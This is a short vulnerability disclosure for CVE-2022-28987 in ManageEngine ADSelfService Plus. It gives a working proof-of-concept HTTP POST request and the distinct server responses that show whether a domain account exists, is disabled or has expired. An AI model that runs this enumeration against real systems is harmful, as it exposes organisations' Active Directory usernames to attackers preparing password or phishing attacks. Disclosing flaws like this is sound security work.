CVE-2022-28987: vulnerability-research/adselfservice-userenum.md at main · passtheticket/vulnerability-research

Permalink

Zoho ManageEngine ADSelfService Plus 6121 Username Enumeration

• Version: 6.1 Build 6121
• Tested against: ADSelfService 6118 - 6121

The domain username (sAMAccountName) enumeration can be conducted through the app. The domain users which are enrolled to the AdSelfService can be enumerated according to response of the application.

Sending following POST request vulnerability is exploited:

PoC HTTP Request:

POST /ServletAPI/accounts/login HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
DNT: 1
Connection: close
Sec-GPC: 1

loginName=USERNAME

The Administrator, krbtgt, Guest are default accounts in the Active Directory. The krbtgt and guest accounts are disabled defaultly.

• If the user is not exist , the response is “eSTATUS":"Permission Denied. Kindly contact your Administrator.”
• If the user is exist , the response is “"LOGIN_STATUS":"PASSWORD","WELCOME_NAME":"{Username}”
• If the user is disabled for example Guest or krbtgt user, the response is “eSTATUS":"Your account has been disabled. Please see your system administrator.”
• If the user is expired, the response is “eSTATUS":"Your account has expired. Please see your system administrator.”